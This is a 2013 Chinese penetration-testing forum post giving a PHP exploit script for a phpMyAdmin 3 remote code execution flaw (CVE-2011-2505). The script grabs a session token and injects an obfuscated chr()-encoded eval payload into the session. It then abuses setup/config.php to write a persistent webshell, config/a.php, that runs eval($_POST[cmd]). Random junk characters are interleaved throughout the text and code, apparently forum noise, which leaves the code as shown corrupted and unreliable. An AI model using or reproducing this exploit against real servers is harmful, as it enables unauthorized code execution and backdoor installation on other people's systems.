中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]
作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。1 c7 x+ F) Q6 n$ u  o! i
' `5 R! d) ?) A2 @. j3 [2 S
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。% A4 I  Z, f" Y8 z* ^/ f4 j- G, w
( f8 a7 g1 ]: P3 b! t3 e
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
% D' Z7 u8 n+ E+ o* p2 m一是session.auto_start = 1;
% C7 Y. I+ Z7 Y, N& l  L" o二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
4 @5 g/ s9 k4 {' j. {" u2 }当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。. K& V0 o+ l1 B4 _5 ?
/ i6 X4 Q$ f. d& d  d( K1 o" r
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。/ Y# e5 ?- W' z, \8 [) k. Z7 r

- X; e' K% P( S1 t% ^于是写了这个php版本的exp,代码如下:5 R7 [; p1 v, ?* \

6 E# V' I3 u5 \4 l2 p#!/usr/bin/php1 G: B) u( _- B/ L6 F' g" y4 d
<?php
. e  E& m! A5 U, g0 y$ r5 Fprint_r('
; j: u- {+ N4 Z+---------------------------------------------------------------------------+6 i( J2 ^$ p( j; t& j
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]) h9 ]1 b# N' t  j1 Z/ A
by oldjun(www.oldjun.com)
6 ^) I" c* B) w/ |, ~) Cwelcome to www.t00ls.net3 B: V. N  b* ^" ~7 u! @
mail: oldjun@gmail.com1 a( V8 G% S- _0 t: _
Assigned CVE id: CVE-2011-25054 d: Z% H2 y* n: b- f) x
+---------------------------------------------------------------------------+
2 P4 s: D) |, p: R3 }! m');
9 M) y- |9 |0 E/ m& l5 h2 W$ l6 F" I9 N) \
/**, P; R$ S. j9 o  }4 W
* working when the directory:"config" exists and is writeable.9 i: m- X! F3 T8 e+ f
**/9 \$ |% N5 l2 R# L6 T
3 u/ U: r5 e6 J) H: @' h' L
if ($argc < 3) {
1 B8 C5 ?) f! q) _& h, _( }    print_r('
2 M$ c0 j9 e; ?5 v+ D8 M+---------------------------------------------------------------------------+
- @% Y! Q6 O$ c9 ~; l) ?Usage: php '.$argv[0].' host path, v0 c1 X1 W# }8 Q
host:      target server (ip/hostname)" O0 i: J3 p1 q6 U7 n; L
path:      path to pma3
+ X) i. h9 y. X! q9 `" K4 RExample:8 Y6 }7 s1 w  f' R+ H/ q$ f5 X2 y
php '.$argv[0].' localhost /pma// a# L' n5 w* C/ o  S5 e
+---------------------------------------------------------------------------+
! o8 W9 U' ^9 z; S/ Y+ j');
! M7 f; m8 c; D+ n    exit;
7 h6 ]9 E2 J2 {/ k, J  C7 x+ G}( U6 V6 w1 [' c; _6 y
4 t) V; N1 v8 c# Q4 u5 E
$host = $argv[1];
! v( s* E1 h  V$path = $argv[2];
7 w0 l' ]! A% @4 K3 G' F+ f) N  w+ T/ R# A, T+ C
/**9 F* S  f6 i% R( i
* Try to determine if the directory:"config" exists
2 H2 q2 _+ }8 _5 S' b$ F**/0 ~$ ^* v; `: w- K
echo "[+] Try to determine if the directory:config exists....\n";( d: Q! x7 W% \7 h' V
$returnstr=php_request('config/');6 X# y, w3 M/ Q" P" j/ b4 W" K
if(strpos($returnstr,'404')){  m& u$ l1 W5 q- L
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
8 k( `5 u0 M, u. H3 O5 V0 k}) Z% n  I$ w5 ]# K

- J: I3 K. c! A. N* f0 j, L# I/**. u: U* B5 U! E) c! H' t
* Try to get token and sessionid. W7 p8 R+ O: w6 {  y
**/
  S9 Y3 L0 E9 ]7 k2 s6 K. Xecho "[+] Try to get token and sessionid....\n";% D6 }0 r( `' N% }8 k! L! D7 D
$result=php_request('index.php');* {0 L8 u+ N+ _+ H1 Q/ f
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);  `) A3 D& n! a( o0 {: z
$token=$resp[3];. K, G# i5 ]) u
$sessionid=$resp[1];' ~# g, I" G: Z/ \8 f* c+ y6 e
if($token && $sessionid){
6 Y0 X5 }9 U, d( h& }4 ?3 h    echo "[+] tokentoken\n";) @: f1 G+ ^# j& Q, {; q4 ^1 d1 j0 ?
    echo "[+] Session IDsessionid\n";
% k9 w- T( h0 ^& o' P0 r# K}else{: g' i/ `  {. w4 C/ P
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
0 ?0 ^* i5 V9 L9 @: _3 v; I' c}+ i5 N% _! E, e( y2 ^

6 E# ~7 o/ t- v& @/**4 p! ~8 z2 s" A, v
* Try to insert shell into session
4 `- S% |* x: e! {3 s- [**/1 [! w6 a/ z; w( g2 U
echo "[+] Try to insert shell into session....\n";- y2 M' \& O5 g( f
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.: l; B- p8 E0 h

5 S4 _% u2 D/ ?7 ?/ L" A/**
) R3 c& ^7 i8 x% V1 w: ] * Try to create webshell
* K$ f; }) y# s! V* Y**/& u- g; T. L1 }& G9 e- q2 @
echo "[+] Try to create webshell....\n";+ ?! ]  D7 @& x2 I  s6 U
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);1 R. T9 t8 T! p" }5 o; l
/**
7 G3 k2 {5 l& \% e& Q( r' l5 n * Try to check if the webshell was created successfully: N- c& Y' Q$ Q
**/
3 R$ q7 E+ J! o& g6 U% Oecho "[+] Try to check if the webshell was created successfully....\n";
( {2 L3 u1 t8 g, ~; n( V6 k8 e$content=php_request('config/config.inc.php');7 R/ M$ {, i* d' |/ q
if(strpos($content,'t00ls')){; |% H, X* K, H& m7 \
    echo "[+] Congratulations! Expoilt successfully....\n";5 k! W$ I! G* Q3 l
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
% w0 s6 p/ D& H% w}else{( A/ W; l5 R1 m! c) y2 K( P
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
' B+ A* ^( I0 T6 {2 \}
% `$ \( B3 l3 e. g! J( T
7 b: c$ {) h+ ?3 yfunction php_request($url,$data='',$cookie=''){
+ `9 T9 D( U4 A7 |( T    global  $host, $path;$ H$ k: e( C; D# e
    ; d( R+ C" @! C3 j% c
    $method=$data?'POST':'GET';
9 ?8 _0 G" k" q/ h3 R3 W    - e/ _# @' y- e; j
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
3 Y6 r) v9 t; j* k8 ?    $packet .= "Accept: */*\r\n";# p$ p7 L) T4 F. [5 A
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
% R6 l1 c( ^+ B6 N4 Z6 R& a9 b    $packet .= "Host: $host\r\n";4 z, i! \" Z. v3 d' a" @% n
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
* |' w# K2 U  J( D    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
5 {- s# Y& S. z' F. {    $packet .= $cookie?"Cookie: $cookie\r\n":"";( D( _. Q$ d/ n' K
    $packet .= "Connection: Close\r\n\r\n";3 ^1 i2 J/ W- h) z: N6 h
    $packet .= $data?$data:"";0 d% N7 I8 O: o- W. ?8 D

; p; \1 T3 r* s$ }$ i, s% o6 `    $fp = fsockopen(gethostbyname($host), 80);
" a1 w2 ~; e, Q* F    if (!$fp) {9 s& I& @0 E" l
    echo 'No response from '.$host; die;, K2 L$ `% y! `; k" S/ V
    }
9 j, k  i6 w; `/ L, p- b    fputs($fp, $packet);$ E  m6 t. b1 {6 @' H1 ?

# Z: u- ~8 c' l* K5 e    $resp = '';
' b6 b" o* V2 M2 m' k% V2 t3 ]+ I* r, ~9 N
    while ($fp && !feof($fp))
' P0 L6 V  A6 r9 b$ O% h        $resp .= fread($fp, 1024);/ L! j( N8 I$ U/ h6 z, K2 o# c
. o8 w9 Y4 I3 g3 H# J
    return $resp;8 |. H- U+ F. V. L5 f
}
& q+ R8 S4 M3 U4 W/ W    ( T; B0 B; c$ t5 ^
?> , @; Z6 ^* F0 K; Q% j/ w) r) I
.



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2